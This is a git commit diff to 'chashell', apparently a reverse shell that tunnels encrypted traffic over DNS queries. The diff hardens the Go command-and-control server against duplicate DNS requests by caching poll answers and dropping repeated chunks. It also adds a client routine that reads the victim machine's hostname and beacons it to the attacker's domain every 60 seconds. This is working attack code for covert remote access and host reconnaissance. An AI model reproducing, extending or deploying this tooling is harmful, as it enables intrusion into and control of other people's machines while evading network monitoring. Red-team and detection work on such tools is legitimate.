Fix GitHub issue #3 (Multiple DNS Queries), implement InfoPacket messages #4, Protobuf version update.

Nicolas Chatelain · Nicolas Chatelain · commit 3906bb0af65e · 2019-05-23T10:18:54.000+02:00
diff --git a/Gopkg.lock b/Gopkg.lock
diff --git a/Gopkg.toml b/Gopkg.toml
@@ -35,7 +35,7 @@
 
 [[constraint]]
   name = "github.com/golang/protobuf"
-  version = "1.2.0"
+  version = "1.3.1"
 
 [[constraint]]
   name = "github.com/miekg/dns"
diff --git a/cmd/server/chaserv.go b/cmd/server/chaserv.go
@@ -3,6 +3,7 @@ package main
 import (
 	"bytes"
 	"chashell/lib/crypto"
+	"chashell/lib/logging"
 	"chashell/lib/protocol"
 	"encoding/hex"
 	"fmt"
@@ -35,6 +36,10 @@ var packetQueue = map[string][]string{}
 // Store the sessions information.
 var sessionsMap = map[string]*clientInfo{}
 
+// Temporary store the polled query. Some DNS Servers will perform multiples DNS requests for one query.
+// We need to send the same query to every requests or the Chashell client will not receive the data.
+var pollCache = map[string]*pollTemporaryData{}
+
 type clientInfo struct {
 	hostname  string
 	heartbeat int64
@@ -48,6 +53,11 @@ type connData struct {
 	packets   map[int32]string
 }
 
+type pollTemporaryData struct {
+	lastseen int64
+	data string
+}
+
 func (ci *clientInfo) getChunk(chunkID int32) connData {
 	// Return the chunk identifier.
 	return ci.conn[chunkID]
@@ -116,22 +126,51 @@ func parseQuery(m *dns.Msg) {
 			// Identify the message type.
 			switch u := message.Packet.(type) {
 			case *protocol.Message_Pollquery:
+				// Check if this DNS poll-request was already performed.
+				temp, valid := pollCache[string(dataPacketRaw)]
+				if valid {
+					log.Println("Duplicated poll query received.")
+					// Send already in cache data.
+					answer = temp.data
+					break
+				}
+
 				// Check if we have data to send.
 				queue, valid := packetQueue[clientGUID]
 
 				if valid && len(queue) > 0 {
 					answer = queue[0]
+					// Store answer in cache for DNS servers which are sending multiple queries.
+					pollCache[string(dataPacketRaw)] = &pollTemporaryData{lastseen: now.Unix(), data: answer}
+					// Dequeue.
 					packetQueue[clientGUID] = queue[1:]
 				}
+			case *protocol.Message_Infopacket:
+				session.hostname = string(u.Infopacket.Hostname)
 
 			case *protocol.Message_Chunkstart:
+				// Some DNS Servers will send multiple DNS queries, ignore duplicates.
+				_, valid := session.conn[u.Chunkstart.Chunkid]
+				if valid {
+					log.Printf("Ignoring duplicated Chunkstart : %d\n", u.Chunkstart.Chunkid)
+					break
+				}
+
 				// We need to allocate a new session in order to store incoming data.
 				session.conn[u.Chunkstart.Chunkid] = connData{chunkSize: u.Chunkstart.Chunksize, packets: make(map[int32]string)}
 
+
 			case *protocol.Message_Chunkdata:
 				// Get the storage associated to the chunkId.
 				connection := session.getChunk(u.Chunkdata.Chunkid)
 
+				// Some DNS Servers will send multiple DNS queries, ignore duplicates.
+				_, valid := connection.packets[u.Chunkdata.Chunknum]
+				if valid {
+					log.Printf("Ignoring duplicated Chunkdata : %v\n", u.Chunkdata)
+					break
+				}
+
 				// Store the data packet.
 				connection.packets[u.Chunkdata.Chunknum] = string(u.Chunkdata.Packet)
 
@@ -151,6 +190,7 @@ func parseQuery(m *dns.Msg) {
 					}
 				}
 
+
 			default:
 				fmt.Printf("Unknown message type received : %v\n", u)
 			}
@@ -198,6 +238,7 @@ func main() {
 		}
 	}()
 
+	// Timeout checking loop
 	go func() {
 		for {
 			time.Sleep(1 * time.Second)
@@ -214,6 +255,21 @@ func main() {
 		}
 	}()
 
+	// Poll-cache cleaner
+	go func() {
+		for {
+			time.Sleep(1 * time.Second)
+			now := time.Now()
+			for pollData, cache := range pollCache {
+				if cache.lastseen + 10 < now.Unix() {
+					logging.Printf("Dropping cached poll query : %v\n", pollData)
+					// Delete from poll cache list.
+					delete(pollCache, pollData)
+				}
+			}
+		}
+	}()
+
 	p := prompt.New(executor, Completer, prompt.OptionPrefix("chashell >>> "))
 	p.Run()
 }
diff --git a/lib/transport/polling.go b/lib/transport/polling.go
@@ -3,6 +3,7 @@ package transport
 import (
 	"chashell/lib/logging"
 	"chashell/lib/protocol"
+	"os"
 	"strings"
 	"time"
 )
@@ -11,11 +12,19 @@ import (
 var packetQueue = make(chan []byte, 100)
 
 func pollRead(stream dnsStream) {
+	sendInfoPacket(stream)
+	loopCounter := 0
 	for {
 		// Sleep, this is a reverse-shell, not a DNS Stress testing tool.
 		time.Sleep(200 * time.Millisecond)
 		// Check for data !
 		poll(stream)
+		loopCounter += 1
+
+		// Send infoPacket each 60 seconds.
+		if loopCounter % 300 == 0 {
+			sendInfoPacket(stream)
+		}
 	}
 }
 
@@ -56,3 +65,24 @@ func poll(stream dnsStream) {
 
 	}
 }
+
+func sendInfoPacket(stream dnsStream){
+	// Get hostname.
+	name, err := os.Hostname()
+	if err != nil {
+		logging.Println("Could not get hostname.")
+		return
+	}
+
+	// Create infoPacket containing hostname.
+	infoQuery := &protocol.Message{
+		Clientguid: stream.clientGuid,
+		Packet: &protocol.Message_Infopacket{
+			Infopacket: &protocol.InfoPacket{Hostname: []byte(name)},
+		},
+	}
+
+	// Send packet.
+	pollPacket, err := dnsMarshal(infoQuery, stream.encryptionKey, true)
+	sendDNSQuery([]byte(pollPacket), stream.targetDomain)
+}
diff --git a/proto/chacomm.proto b/proto/chacomm.proto
@@ -11,6 +11,7 @@ message Message {
         ChunkStart chunkstart = 2;
         ChunkData chunkdata = 3;
         PollQuery pollquery = 4;
+        InfoPacket infopacket = 5;
     }
 }
 

Original file line number	Diff line number	Diff line change
`@@ -11,6 +11,7 @@ message Message {`
`11`	`11`	`ChunkStart chunkstart = 2;`
`12`	`12`	`ChunkData chunkdata = 3;`
`13`	`13`	`PollQuery pollquery = 4;`
	`14`	`+ InfoPacket infopacket = 5;`
`14`	`15`	`}`
`15`	`16`	`}`
`16`	`17`